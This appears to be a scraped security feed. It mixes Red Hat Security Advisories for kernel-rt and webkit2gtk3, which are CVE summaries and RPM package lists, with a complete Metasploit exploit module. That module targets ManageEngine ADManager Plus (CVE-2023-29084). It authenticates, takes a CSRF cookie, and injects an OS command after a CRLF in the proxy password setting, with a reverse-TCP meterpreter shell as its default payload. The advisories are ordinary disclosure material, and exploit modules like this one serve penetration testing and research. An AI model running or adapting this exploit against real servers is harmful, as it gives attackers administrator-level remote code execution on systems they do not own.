kernel-rt-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42896  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH8ffNzjgjWX9erEAQgyzQ//ePc2fU5umHOIMReDPuiaMY7szYylgtmi  
x2gO6L9pgdS9eveUQjsiBK4Clin+7MIX1RTa0Kr+QzC+VCo+4SRP85vE/WDXwEI1  
usJ23fZH2CUURcy38ejG7Cw+xQbFQWnhoFAl0s8TZbLAzKo4CNoVf0FtLrwGif/x  
KadeI4bpdI9kjnVqjdraIaUJeTGAaLH6oKfCBimgTudV1hpOYJF7nO7gnr2Jn9fh  
o1Wa5VXj+z33U6+l6SEVcUtCXRrWIpuwVa47Nan5vAdD5I3tQQbWhsac9AUWF5GO  
KJBdJl8hF3nEYtyQWWlgtg6wQce1WwQCEJBE2ZKjOjz/ppxE8+X9sZnm3GRsTd47  
CvtB7SiMlDAVpSPs6ILahXpQwXCnW0Nhg/Egs5K6QBtVGi1/06h1oSRKuToa6B+v  
0E6USqCbehmneZAs+SfwOcD5de4VmuVS1pCfc905eO+DdWWyA7Zfu6kofYlpxFCU  
+z/GUKj5xyMZgOV6TpJNDrmHuvaaoheNyYdh7kf9d5QYElyrBb/o0UinzGkNghAP  
lrcyKis3NsGxcH0kNkNt6k+Q3g2zLa42OdA7JxtgfoXK/2mpXHTeqxd2RuZrp87G  
qCI2oFQv/20OG6APwESBC0ae3ipF9sZA9do4Y1LrI44pdsBBif3TXBX5HGkmDhit  
VTe8HYqeOrw=  
=lylS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3462-01

Red Hat Security Advisory 2023-3470-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:3470-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3470  
Issue date:        2023-06-06  
CVE Names:         CVE-2023-0461 CVE-2023-2008 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.9.0) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

* kernel: udmabuf: improper validation of array index leading to local  
privilege escalation (CVE-2023-2008)

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt-debug: BUG: MAX_LOCKDEP_CHAINS too low (BZ#2181286)

* kernel-rt: update RT source tree to the latest RHEL-9.0.z9 Batch  
(BZ#2186491)

* kernel-rt: INFO: task deadline_test:1778 blocked for more than 622  
seconds (BZ#2188662)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets  
2186862 - CVE-2023-2008 kernel: udmabuf: improper validation of array index leading to local privilege escalation  
2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.58.1.rt21.129.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-kvm-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-kvm-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.58.1.rt21.129.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-2008  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH8fc9zjgjWX9erEAQixqg//TKjSUs6S1BZfD0fAMLRlETm8X+zQSko2  
/0J2pHxC77zfwa4Tdf0vgCx9WDOzrZE8OQwPU7rchBIRLd/3LZyaVpw88ujtkO7z  
gmTE1EVBOrNrQF4UsZvvI1DhIIjHJTgyA0YZu6k3SnSJ3WCVLJvZoiFMMFJwE3BT  
qFZUe78WC/KwSM2sNsnyPiHEbkv5sIU/nCpHdf0CuriSNaOmf8vYhB5lO4w5+D3G  
pe4ebCa/urh0PRY9XAvlcneN6JhAhrGKerdx2U3M1JV2xLUi6GEiTUabQwaWsIeP  
pTOMQ13b2+0Dx2yGjNVGb4BiNczq1J+4xC2Y6agGhsrEjS25cTs/+VUIU7u55Z6v  
ekZXQqqszCWpmzbFtsPB2piRVswywCcv5C3H+PjIkwtb/ZXt6s0wf15EXubp70Pk  
nxWMI3bDuZKWGqV4QJ0WjCyv9ZrZ07Z/tz/x5+G7W8dsz5NYOd57QWVOH1N8abJe  
0BAn/wxLiovVp8SVXvFhv62HgD0jwWCm/2Qnnk8vUpz14o4WDhazki2n240fG/to  
Gf4V9+u59QhSJoqm15Wn8TdagXGtAJpoF4035uxIsDc6qitqfgUdr+/QKdS1DHbw  
dteCG6cCVXKsdiAP5sLoZc1TLIL7rsW24mKemHx/WA97wYdyfOq1lUR5YyvcZupy  
uaJN7YNDHbs=  
=rdIS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3470-01

Red Hat Security Advisory 2023-3433-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include out of bounds read and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:3433-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3433  
Issue date:        2023-06-05  
CVE Names:         CVE-2023-28204 CVE-2023-32373   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: a use-after-free when processing maliciously crafted web  
content (CVE-2023-32373)

* webkitgtk: an out-of-bounds read when processing malicious content  
(CVE-2023-28204)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209208 - CVE-2023-28204 webkitgtk: an out-of-bounds read when processing malicious content  
2209214 - CVE-2023-32373 webkitgtk: a use-after-free when processing maliciously crafted web content

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.38.5-1.el8_8.4.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.4.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.4.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.4.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28204  
https://access.redhat.com/security/cve/CVE-2023-32373  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH54S9zjgjWX9erEAQik3A/+IpcsSu+L3IB36Z1OGQp+3Ub+9kJQ32iq  
q683C4Md3OK5k8MBLO2lry3iRwz++Dr6sYJnUkzgehxvDbg/EEjVajGy3XkOt4gH  
z4NLf9ANS6uxGbH4vAyh58y4eUCwcFDAmbQ4mls/vsCUj/nWLtYYwkPurq8UT0tC  
A2Wkdy74Qy6S6x9sPMFhjX6/IxLEbyT4zspxoV3w04Hkv8JhGGc6N48d7TZkc0wL  
ta8p2J9J2zs44MxpAOpO1CUemZouLDAGYIFZK0OuqiD4PGJO1zrKvpxklK2iQb8L  
Xo5E3AOeqA9OypynpFp3+/qM7kdLKkN4iGeh4OyyBF1d2/qfEF4yhy8L0ZB1Jngz  
o78+8uB01skD3lLsz+hrln7IF7WWQKClS2nLhiplTM+PRiwVU0OfaB4cX3aQI0CH  
uoO4846LV6GJssLUax9LsBVAu3tM4PeYvb1Ci0dScsvxb8MO+UFuqwYDRh76IJWK  
xYEmDYC6dgcDvnUbiky99OENpJZte9t19pA9x/T3oPYw//DkIBxL8oYqxPDfMo4z  
uO2NavUxK4VWoX/qPZ2cMEEDvAJH6EpSvzur0vX97I42+RKYuds6VuF2gifv5EeD  
7QKKK7zm2xdkMiJVMq5wo7tIPhud5miXU6QUXxD08EAf0KbSjlt6OrTViluaGcOA  
wjHPL3ZkmgQ=  
=cMOt  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3433-01

ManageEngine ADManager Plus versions prior to build 7181 are vulnerable to an authenticated command injection vulnerability due to insufficient validation of user input when performing the ChangePasswordAction function before passing it into a string that is later used as an OS command to execute.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  require 'json'  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection',        'Description' => %q{          ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient          validation of user input when performing the ChangePasswordAction function before passing it into a string that is later          used as an OS command to execute.          By making a POST request to /api/json/admin/saveServerSettings with a params POST          parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a          carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user          running ADManager Plus, which will typically be the local administrator.          Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,          so this vulnerability does require authentication to exploit.          As this exploit modifies the HTTP proxy settings for the entire server, one cannot use fetch payloads          with this exploit, since these will use HTTP connections that will be affected by the change in configuration.        },        'Author' => [          'Simon Humbert', # Disclosure of bug via ZDI          'Dinh Hoang', # Aka hnd3884. Writeup and PoC          'Grant Willcox', # Metasploit module        ],        'References' => [          ['CVE', '2023-29084'],          ['URL', 'https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/'], # Writeup          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-438/'], # ZDI Advisory          ['URL', 'https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html'], # Advisory          ['URL', 'https://www.manageengine.com/products/ad-manager/release-notes.html'] # Release Notes and Reporter Acknowledgement        ],        'DisclosureDate' => '2023-04-12',        'License' => MSF_LICENSE,        'Platform' => 'win',        'Arch' => [ARCH_CMD],        'Privileged' => true,        'Payload' => {          'BadChars' => "\x22\x0A\x0D\x00[{}]:," # Avoid double quotes, aka 0x22, and some other characters that might cause issues.        },        'Targets' => [          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },              'Payload' => { 'Compat' => { 'ConnectionType' => 'reverse bind none' } }            }          ],        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8080        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES] # We are changing the proxy settings for every HTTP connection on the target server.        }      )    )    register_options(      [        OptString.new('USERNAME', [true, 'The user to log into ADManager Plus as', 'admin']),        OptString.new('PASSWORD', [true, 'The password to log in with', 'admin']),        OptString.new('DOMAIN', [true, 'The domain to log into', 'ADManager Plus Authentication'])      ]    )  end  def login(username, password, domain)    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'j_security_check'),      'method' => 'POST',      'vars_get' => {        'LogoutFromSSO' => 'true'      },      'vars_post' => {        'is_admp_pass_encrypted' => 'false', # Optional but better to keep it in here to match normal request.        'j_username' => username,        'j_password' => password,        'domainName' => domain,        'AUTHRULE_NAME' => 'ADAuthenticator'      },      'keep_cookies' => true    )    unless res && (res.code == 302 || res.code == 303)      fail_with(Failure::NoAccess, 'Could not log in successfully!')    end    print_good('Logged in successfully!')  end  def check    res = send_request_cgi(      'uri' => target_uri.path,      'method' => 'GET'    )    unless res && res.code == 200 && res.body      return CheckCode::Unknown('Browsing to root of website returned a non-200 or empty response!')    end    unless res.body&.match(/\.val\('ADManager Plus Authentication'\)/)      return CheckCode::Safe('Target is not running ADManager Plus!')    end    build_number = res.body&.match(/src=".+\.js\?v=(\d{4})"/)    unless build_number      return CheckCode::Unknown('Home page did not leak the build number via the ?v= parameter as expected!')    end    build_number = build_number[1]    print_good("The target is running AdManager Plus build #{build_number}!")    # Versions 7181 and later are patched, everything prior is vulnerable.    target_build = Rex::Version.new(build_number)    if target_build >= Rex::Version.new('7181')      CheckCode::Safe('Target is running a patched version of AdManager Plus!')    elsif target_build < Rex::Version.new('7181')      CheckCode::Appears('Target appears to be running a vulnerable version of AdManager Plus!')    else      CheckCode::Unknown("An unknown error occurred when trying to parse the build number: #{build_number}. Please report this error!")    end  end  def exploit    res = send_request_cgi(      'uri' => target_uri.path,      'method' => 'GET',      'keep_cookies' => true    )    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code!')    end    login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DOMAIN'])    # We need to do this post login otherwise we will get errors. This also ensures we get updated    # cookies post login as these can sometimes change post login process.    res = send_request_cgi(      'uri' => target_uri.path,      'method' => 'GET',      'keep_cookies' => true    )    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code post authentication!')    end    # Check that we actually got our cookies updated post authentication and visiting the homepage.    unless res&.get_cookies&.match(/adscsrf=.*?;.*?;.*?_zcsr_tmp=.*?;/)      fail_with(Failure::UnexpectedReply, 'Target did not respond with the expected updated cookies after logging in and visiting the home page.')    end    @csrf_cookie = nil    for cookie in @cookie_jar&.cookies      if cookie.name == 'adscsrf'        @csrf_cookie = cookie.value        break      end    end    fail_with(Failure::NoAccess, 'Could not obtain adscrf cookie!') if @csrf_cookie.blank?    retrieve_original_settings    begin      modify_proxy(create_params_value_enable(payload.encoded))    ensure      modify_proxy(create_params_value_restore)    end  end  def retrieve_original_settings    res = send_request_cgi(      {        'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'getServerSettings'),        'method' => 'POST',        'vars_post' => {          'adscsrf' => @csrf_cookie        },        'keep_cookies' => true      }    )    unless res && res.code == 200 && res&.body&.match(/ads_admin_notifications/)      fail_with(Failure::UnexpectedReply, 'Was unable to get the admin settings for restoration!')    end    json_body = JSON.parse(res.body)    server_details = json_body['serverDetails']    unless server_details      fail_with(Failure::UnexpectedReply, 'Was unable to retrieve the server settings!')    end    server_details.each do |elm|      next unless elm['tabId'] == 'proxy'      @original_port = elm['PORT']      @original_password = elm['PASSWORD']      @proxy_enabled = elm['ENABLE_PROXY']      @original_server_name = elm['SERVER_NAME']      @original_user_name = elm['USER_NAME']      break    end  end  def modify_proxy(params)    res = send_request_cgi(      {        'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'saveServerSettings'),        'method' => 'POST',        'vars_post' => {          'adscsrf' => @csrf_cookie,          'params' => params        },        'keep_cookies' => true      }    )    if res && res.code == 200      if res.body&.match(/{"isAuthorized":false}/)        fail_with(Failure::NoAccess, 'Somehow we became unauthenticated during exploitation!')      elsif res.body&.match(/Successfully updated the following settings.*-.*Proxy Settings/)        print_warning("Settings successfully changed confirmation received before timeout occurred. Its possible the payload didn't execute!")      elsif res.body&.match(/"status":"error"/)        print_error("The payload somehow triggered an error on the target's side! Error was: #{res.body}")      else        fail_with(Failure::PayloadFailed, 'Was not able to successfully update the settings to execute the payload!')      end    elsif res.nil?      print_good('Request timed out. Its likely the payload executed successfully!')    else      fail_with(Failure::UnexpectedReply, "Target responded with a non-200 OK code to our saveServerSettings request! Code was #{res.code}")    end  end  def create_params_value_enable(cmd)    [      {        tabId: 'proxy',        ENABLE_PROXY: true,        SERVER_NAME: 'localhost', # In my experience this worked most reliably.        USER_NAME: Rex::Text.rand_text_alphanumeric(4..20).to_s,        PASSWORD: "#{Rex::Text.rand_text_alphanumeric(4..20)}\r\n#{cmd}",        PORT: datastore['RPORT'] # In my experience, setting this to the same PORT as the web server worked reliably.      }    ].to_json  end  def create_params_value_restore    [      {        tabId: 'proxy',        ENABLE_PROXY: @proxy_enabled,        SERVER_NAME: @original_server_name,        USER_NAME: @original_user_name,        PASSWORD: @original_password,        PORT: @original_port      }    ].to_json  endend

ManageEngine ADManager Plus Command Injection

Red Hat Security Advisory 2023-3432-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include out of bounds read and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:3432-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3432  
Issue date:        2023-06-05  
CVE Names:         CVE-2023-28204 CVE-2023-32373   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: a use-after-free when processing maliciously crafted web  
content (CVE-2023-32373)

* webkitgtk: an out-of-bounds read when processing malicious content  
(CVE-2023-28204)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209208 - CVE-2023-28204 webkitgtk: an out-of-bounds read when processing malicious content  
2209214 - CVE-2023-32373 webkitgtk: a use-after-free when processing maliciously crafted web content

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.38.5-1.el9_2.2.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.2.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.2.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.2.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.2.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el9_2.2.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el9_2.2.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el9_2.2.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.2.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el9_2.2.x86_64.rpm  
